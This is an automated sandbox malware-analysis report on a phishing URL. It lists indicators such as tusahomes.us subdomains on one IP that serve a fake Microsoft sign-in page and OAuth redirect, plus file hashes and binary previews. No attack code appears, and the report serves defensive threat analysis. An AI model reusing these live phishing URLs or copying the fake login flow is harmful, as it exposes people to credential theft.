            https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_41f36656d3c0bb04c90c.js0%Avira URL Cloudsafe
            https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_268b957e4bf672b8fe6b.js0%Avira URL Cloudsafe
            https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg0%Avira URL Cloudsafe
            https://a4eaec44075f43d19af55316af4b7550.tusahomes.us/api/report?catId=GW+estsfd+wst0%Avira URL Cloudsafe
            https://static.pagewizcdn.com/LPStaticResources/sweet-alert.min.js?v=18.01.240%Avira URL Cloudsafe
            https://ef2ef9be16e34f1fb8a6223a6703c135.tusahomes.us0%Avira URL Cloudsafe
            https://c547f1062152409fa58dda457a02be72.tusahomes.us/login0%Avira URL Cloudsafe
            https://f169b5b085ea4e1ba7289951debea536.tusahomes.us0%Avira URL Cloudsafe
            https://static.pagewizcdn.com/LPStaticResources/bootstrap.min.js?v=18.01.240%Avira URL Cloudsafe
            https://3a91bb8c3181471eb888670f91e8c086.tusahomes.us0%Avira URL Cloudsafe
            https://300e1b2ce1a7492a96e37e48ada077e8.tusahomes.us0%Avira URL Cloudsafe
            https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js0%Avira URL Cloudsafe
            https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_cwzkvppibgumnhupu2wjoa2.js0%Avira URL Cloudsafe
            https://static.pagewizcdn.com/LPStaticResources/lpFormValidations.js?v=18.01.240%Avira URL Cloudsafe
            https://6f5fb8dbb10b4959bef1db0ca1018bed.tusahomes.us0%Avira URL Cloudsafe
            https://static.pagewizcdn.com/LPStaticResources/FontFix.js?v=18.01.240%Avira URL Cloudsafe
            https://stats.pagewiz.com/PWPixel.aspx?guid=f24cc4c2-2ef1-79f4-1744157914689-6fd32dc72398&op=1&pid=648467&refer=&href=http%3A//p1.pagewiz.net/vericastharlandclarke/&hostname=p1.pagewiz.net&referrer=&appCodeName=Mozilla&appName=Netscape&appVersion=5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/134.0.0.0%20Safari/537.36&cookieEnabled=true&language=Mozilla&platform=Win32&userAgent=Mozilla/5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/134.0.0.0%20Safari/537.36&screenWidth=1280&screenHeight=1024&uv=10%Avira URL Cloudsafe
            https://statdumper.pagewiz.com/counter.aspx?pageid=648467&isunique=10%Avira URL Cloudsafe
            https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif0%Avira URL Cloudsafe
            https://static.pagewizcdn.com/LPStaticResources/swfobject.js?v=18.01.240%Avira URL Cloudsafe
            https://m1.pagewizcdn.com/Media/2025-04-08-18-41-23-280meltrdtlzycycrwsmkhokxzmr_UserMedia.png0%Avira URL Cloudsafe
            https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css0%Avira URL Cloudsafe
            https://static.pagewizcdn.com/LPStaticResources/style2/sweet-alert.css?v=18.01.240%Avira URL Cloudsafe
            https://static.pagewizcdn.com/LPStaticResources/jquery.tip.js?v=18.01.240%Avira URL Cloudsafe
            https://static.pagewizcdn.com/LPStaticResources/stats.js?v=18.01.240%Avira URL Cloudsafe
            https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/js/ConvergedLogin_PCore_JXiTFACSOROsZgtGRJo1aA2.js0%Avira URL Cloudsafe
            https://static.pagewizcdn.com/LPStaticResources/jquery.json-2.2.js?v=18.01.240%Avira URL Cloudsafe
            https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg0%Avira URL Cloudsafe
            https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/?wZfUflpx=67f5bce71f9fd88e9ef40d750%Avira URL Cloudsafe

            Download Network PCAP: filteredfull

            NameIPActiveMaliciousAntivirus DetectionReputation
            69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
            137.184.178.231
            truetrue
              unknown
              126d7c624ad3410bb741b30b9bf3d28f.tusahomes.us
              137.184.178.231
              truetrue
                unknown
                1885148700.rsc.cdn77.org
                79.127.206.207
                truefalse
                  unknown
                  stats.pagewiz.com
                  52.168.137.144
                  truefalse
                    unknown
                    p1.pagewiz.net
                    13.90.63.16
                    truefalse
                      unknown
                      ab52444af96f49b7b110b6e3700ca950.tusahomes.us
                      137.184.178.231
                      truetrue
                        unknown
                        statdumper.pagewiz.com
                        52.168.137.144
                        truefalse
                          unknown
                          vericast.tusahomes.us
                          137.184.178.231
                          truetrue
                            unknown
                            a4eaec44075f43d19af55316af4b7550.tusahomes.us
                            137.184.178.231
                            truetrue
                              unknown
                              www.google.com
                              142.251.40.132
                              truefalse
                                high
                                1497675516.rsc.cdn77.org
                                79.127.206.235
                                truefalse
                                  unknown
                                  330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                  137.184.178.231
                                  truetrue
                                    unknown
                                    8f0da58963954c5ebda6645ba9a83b28.tusahomes.us
                                    137.184.178.231
                                    truetrue
                                      unknown
                                      c547f1062152409fa58dda457a02be72.tusahomes.us
                                      137.184.178.231
                                      truetrue
                                        unknown
                                        static.pagewizcdn.com
                                        unknown
                                        unknownfalse
                                          unknown
                                          m1.pagewizcdn.com
                                          unknown
                                          unknownfalse
                                            unknown
                                            NameMaliciousAntivirus DetectionReputation
                                            https://static.pagewizcdn.com/LPStaticResources/style2/lpCommon.css?v=18.01.24false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://vericast.tusahomes.us/?vffzw9n=Y2Y4NGIwYjU5NTVmNDk0YzkxMmQ1OThhMjBmZGRjMzg%3Dfalse
                                              unknown
                                              https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=truetrue
                                                unknown
                                                https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svgtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://static.pagewizcdn.com/LPStaticResources/fancybox/source/jquery.fancybox.css?v=18.01.24false
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://p1.pagewiz.net/favicon.icofalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.giftrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://c.pki.goog/r/r4.crlfalse
                                                  high
                                                  https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/favicon.icotrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://ab52444af96f49b7b110b6e3700ca950.tusahomes.us/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/67f5bce71f9fd88e9ef40d75/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://8f0da58963954c5ebda6645ba9a83b28.tusahomes.us/Me.htm?v=3true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0false
                                                    unknown
                                                    https://static.pagewizcdn.com/LPStaticResources/fancybox/source/jquery.fancybox.js?v=18.01.24false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4f75990aeef30238698e.jstrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://c.pki.goog/r/gsr1.crlfalse
                                                      high
                                                      https://static.pagewizcdn.com/LPStaticResources/style2/bootstrap.min.css?v=18.01.24false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://p1.pagewiz.net/Handler/Clicklog.aspx?PageId=648467false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_268b957e4bf672b8fe6b.jstrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_41f36656d3c0bb04c90c.jstrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.icotrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://126d7c624ad3410bb741b30b9bf3d28f.tusahomes.us/shared/1.0/content/js/BssoInterrupt_Core_9810YxmrLqOR1rQ4anyNMg2.jstrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svgtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://a4eaec44075f43d19af55316af4b7550.tusahomes.us/api/report?catId=GW+estsfd+wsttrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://static.pagewizcdn.com/LPStaticResources/sweet-alert.min.js?v=18.01.24false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://c547f1062152409fa58dda457a02be72.tusahomes.us/logintrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.jstrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://static.pagewizcdn.com/LPStaticResources/bootstrap.min.js?v=18.01.24false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_cwzkvppibgumnhupu2wjoa2.jstrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://static.pagewizcdn.com/LPStaticResources/lpFormValidations.js?v=18.01.24false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://m1.pagewizcdn.com/Media/2025-04-08-18-41-23-280meltrdtlzycycrwsmkhokxzmr_UserMedia.pngfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://static.pagewizcdn.com/LPStaticResources/FontFix.js?v=18.01.24false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.giftrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://statdumper.pagewiz.com/counter.aspx?pageid=648467&isunique=1false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://stats.pagewiz.com/PWPixel.aspx?guid=f24cc4c2-2ef1-79f4-1744157914689-6fd32dc72398&op=1&pid=648467&refer=&href=http%3A//p1.pagewiz.net/vericastharlandclarke/&hostname=p1.pagewiz.net&referrer=&appCodeName=Mozilla&appName=Netscape&appVersion=5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/134.0.0.0%20Safari/537.36&cookieEnabled=true&language=Mozilla&platform=Win32&userAgent=Mozilla/5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/134.0.0.0%20Safari/537.36&screenWidth=1280&screenHeight=1024&uv=1false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.csstrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://static.pagewizcdn.com/LPStaticResources/swfobject.js?v=18.01.24false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://p1.pagewiz.net/vericastharlandclarke/false
                                                        unknown
                                                        https://static.pagewizcdn.com/LPStaticResources/style2/sweet-alert.css?v=18.01.24false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://static.pagewizcdn.com/LPStaticResources/jquery.tip.js?v=18.01.24false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://static.pagewizcdn.com/LPStaticResources/stats.js?v=18.01.24false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/js/ConvergedLogin_PCore_JXiTFACSOROsZgtGRJo1aA2.jstrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://static.pagewizcdn.com/LPStaticResources/jquery.json-2.2.js?v=18.01.24false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/?wZfUflpx=67f5bce71f9fd88e9ef40d75true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svgtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        http://e5faadac711040eb937b0912c3da77fd.tusahomes.us/chromecache_103.4.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://9a8c9517625949ea8fa3d65334092b8d.tusahomes.uschromecache_75.4.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://b2fe0b31e2db4a9bb8612e8faea6b3fc.tusahomes.uschromecache_75.4.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://358bda4ee93f4d7e892828ac40949b9c.tusahomes.uschromecache_75.4.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://log.imoon.info/index.html?PAGE_ID=chromecache_82.4.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://21f6d35d7587443b8bb832dc786aaf9e.tusahomes.us/douglascrockford/JSON-jschromecache_103.4.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://aace5a839df74152aceaaf57ce684743.tusahomes.uschromecache_75.4.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://330c68f2903044fdaf0390e944b7092d.tusahomes.uschromecache_75.4.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://13ed1ff861d94c6daedecfbb5c3a2270.tusahomes.uschromecache_75.4.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.apache.org/licenses/LICENSE-2.0chromecache_76.4.drfalse
                                                          high
                                                          https://ef2ef9be16e34f1fb8a6223a6703c135.tusahomes.uschromecache_75.4.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://3a91bb8c3181471eb888670f91e8c086.tusahomes.uschromecache_75.4.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://300e1b2ce1a7492a96e37e48ada077e8.tusahomes.uschromecache_75.4.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.google.com/fonts/earlyaccesschromecache_89.4.drfalse
                                                            high
                                                            https://f169b5b085ea4e1ba7289951debea536.tusahomes.uschromecache_75.4.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://fancyapps.com/fancybox/chromecache_108.4.drfalse
                                                              high
                                                              http://www.opensource.org/licenses/mit-license.php)chromecache_103.4.drfalse
                                                                high
                                                                https://6f5fb8dbb10b4959bef1db0ca1018bed.tusahomes.uschromecache_75.4.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                79.127.206.207
                                                                1885148700.rsc.cdn77.orgCzech Republic
                                                                9080GINCzechRepublicEUCZfalse
                                                                79.127.206.234
                                                                unknownCzech Republic
                                                                9080GINCzechRepublicEUCZfalse
                                                                79.127.206.235
                                                                1497675516.rsc.cdn77.orgCzech Republic
                                                                9080GINCzechRepublicEUCZfalse
                                                                137.184.178.231
                                                                69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usUnited States
                                                                11003PANDGUStrue
                                                                142.251.40.132
                                                                www.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                52.168.137.144
                                                                stats.pagewiz.comUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                13.90.63.16
                                                                p1.pagewiz.netUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                IP
                                                                192.168.2.5
                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1660141
                                                                Start date and time:2025-04-09 02:17:28 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 3m 14s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:browseurl.jbs
                                                                Sample URL:http://p1.pagewiz.net/vericastharlandclarke/
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:16
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal64.phis.win@24/83@45/8
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 199.232.210.172, 142.251.35.163, 142.251.40.206, 142.250.80.110, 192.178.155.84, 142.251.35.174, 142.250.80.78, 142.251.40.170, 142.250.65.170, 142.251.40.99, 142.250.81.238, 172.217.165.142, 142.250.80.14, 142.250.65.174, 142.251.40.110, 142.251.40.234, 142.250.80.74, 142.251.40.106, 142.250.64.74, 142.250.80.10, 142.250.64.106, 142.250.72.106, 142.251.41.10, 142.251.40.138, 142.250.80.106, 142.251.40.202, 142.250.80.42, 142.250.65.202, 142.250.176.202, 172.217.165.131, 142.250.64.110, 142.250.65.195, 23.204.23.20, 20.109.210.53
                                                                • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ajax.googleapis.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, c.pki.goog
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: http://p1.pagewiz.net/vericastharlandclarke/
                                                                No simulations
                                                                No context
                                                                No context
                                                                No context
                                                                No context
                                                                No context
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 786 x 154, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):100011
                                                                Entropy (8bit):7.965757412534382
                                                                Encrypted:false
                                                                SSDEEP:1536:5vpVlMq6iH49ZuliHDtaEVK6UruuQouAhLDeQdgOsXlDg7wiVtJIb+gGDG4bWC5:5hDMqkIIDPYuufOQyTVDSnSGgC5
                                                                MD5:962CF5BCD8A6984A323944951DD49F06
                                                                SHA1:375BE4DE709A04D072E185CC859E04AA597C5E31
                                                                SHA-256:CC143FC6F88D1B0043BCA954FC0F49C18BD63775EAFE5B9A5E65C7EC3EC1DC7F
                                                                SHA-512:758DE5E3BB1F078F9DDCEEF8CF5A011ED658F999CCE217C0D36984433F52F943086693E5B509AEE3679351887EF23D01411BF7F1369EF00341C14FF8334C3134
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://m1.pagewizcdn.com/Media/2025-04-08-18-41-23-280meltrdtlzycycrwsmkhokxzmr_UserMedia.png
                                                                Preview:.PNG........IHDR.............=.~....>iCCPICC Profile..H..W.XS...[....B..z.D....B..7.!..J...b/...]T....(X.....E...........u_...........s..@.8W,.C5....J.B..).i.R.@.. .*p........m..w{w.zC..(..g..5M.......q.........*.XR..Q.[L...0l@[...x..g)p..g(...OB...6.T.\.$...K.g...Z...".P..:.b....|..!..>b.e...t....1...f.a.\..(,..q.......'..a..5[..'.3.....2L..W.........|.?.(%[....G.x.lX3...3............%..)..@.W.:EX.I.X....x..&..8e,.!S.f)..\.<.,.}in"K..:[.Q.cj.....S .,.&EA...SAn|..gtq6;j.G"...o.q.@.....2%.qJ......b....(%.W...........s...D..A.AAJ..\... ..g.Qb.R.0 N1....b.... /D.C.ZP....'......3.1..<...nX.".|...l...@.[...r......^)z...H@...G%38"Y.#..xP...H......{...._.X...d.{..#r....A8..R.(.P.$..2..D......&.... ..aA&B.H.#2..=.A.@b(1.h...7.......L.sp....O.....k..........]P?XY...k.[CM7<....P.....#...p?....le..0~....~..J?.3.%...?.T.Ws.R.....(r...7{..........=...~..v.;......k...v........5.-N.O....#....U.........P0E......aVv!......G.s..pqvq.@.}Q.......n.wn................>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, original size modulo 2^32 190299
                                                                Category:downloaded
                                                                Size (bytes):61226
                                                                Entropy (8bit):7.996069560611629
                                                                Encrypted:true
                                                                SSDEEP:1536:tywdXtYdmXTxVTbyw2qL4Rdj2VxwuS4VtI:ndXyUX3brr+dqVxQ4Vq
                                                                MD5:847B9D2F48CC98164CFC929E1616FD52
                                                                SHA1:793AE2637D5E41AA53C54949F4E0A0D8CDED3820
                                                                SHA-256:BD21B7C1BDF0D5B77224F4746D63A09B0F2319F4A5B60EEA31B3D0D9463F2DBB
                                                                SHA-512:CBFFAC4CBD81618D07F6A9223F50AB532486FB48FA8F1DC15A604CAFB0A168CA1BC28598DE1AF1FA545E4569089174BD30303F053CFC27B2CF08FB29331F43C8
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                                Preview:...........y{..8....2.^...Q$;I.)..c+..o.....CI..D"U...c..f.........}.X$8....`..&.F.M3..>.Yr{q...`...4.f....g.^s6O.....9;c.].a...Y.".....fI8.n.L..cQs.f..5...'..a....%<.'Q#i.a{.<.v..G.....~.4L1...20..$....k>.....[.Y?J.q.n.Iu..wA.kA./z..#>.G.O.`...4....a.,.;.g<.nOngu...y.!.4L.a.. ..c>.OxR.e..Bs|.Da.....o...Yx......".vu.^ilO...N.WaT.....}.....1....2.s/...A...a..0.yn.....0H`r.x.+.2..o'...8...n|U7.C+.....1.r..4n....\R.+a..`.M.7kU.b.......#..j.......c....K.cje.Py``.b...AU...w..4L8.^4..g...jv..e.$.Qu../7A....i\S..".......\.|.)...z......)..0..C4h.Z..... y(Oj.....M..bM.oV%...|X......^B..... ..~..5Mz;..A...(N.......~0...A.?F.x..}....O.nTLb...q.$Y.9..5..6|/.-......a..@...'I8..<.&h..T.`d.n%IP7.....$q5..4c...x........A...43..]..7.C..........D.$.(Q.<.............j.G6..p.5L...M....u..!w.^l.q...L[.....oj M..g..C>C.%./4'...2<:4.g.J.~..r.....uqv..q..'6U_.zc.....V..s..~,B+BZ75?.e..a.1L....R...F.m.+a..0...&.Fu|.#.7..a..uam..i].a....6c.Z.W<..t...v....
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, original size modulo 2^32 1864
                                                                Category:dropped
                                                                Size (bytes):673
                                                                Entropy (8bit):7.6584200238076905
                                                                Encrypted:false
                                                                SSDEEP:12:XRt8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:X+UVpkNK0Rwid81p6btk7LqZ6D
                                                                MD5:2D2CBA7D7DC75F3BA9DC756738D41A6E
                                                                SHA1:F87FD26066ED5E52A65DEE0ED2D581D3C3EA15AC
                                                                SHA-256:00E21864CF1BC70302EBB5B496C6C471A7DA8CBF600630B478A3E2376ED20EA2
                                                                SHA-512:46F17658CA247C02F612213025350390D8F62179C8DE26725EB17F5CCFAFDD63F2149DA1765D3C2F3A12FE85EF29CAC58457B0D5C2F8DA8DED6E1231A35F199D
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (46718)
                                                                Category:downloaded
                                                                Size (bytes):142581
                                                                Entropy (8bit):5.431651857534223
                                                                Encrypted:false
                                                                SSDEEP:1536:iyeDWHTp7gTPRUbx3XCg/MJA5Ndii5WLeVdgWLDY2Js0VgtWyTJmxyAXP3onrGGU:5Hlw1g/Mq529EveUynbBws3cyG
                                                                MD5:0DEEBC6DEA05DFB05B6965F765EBC2CA
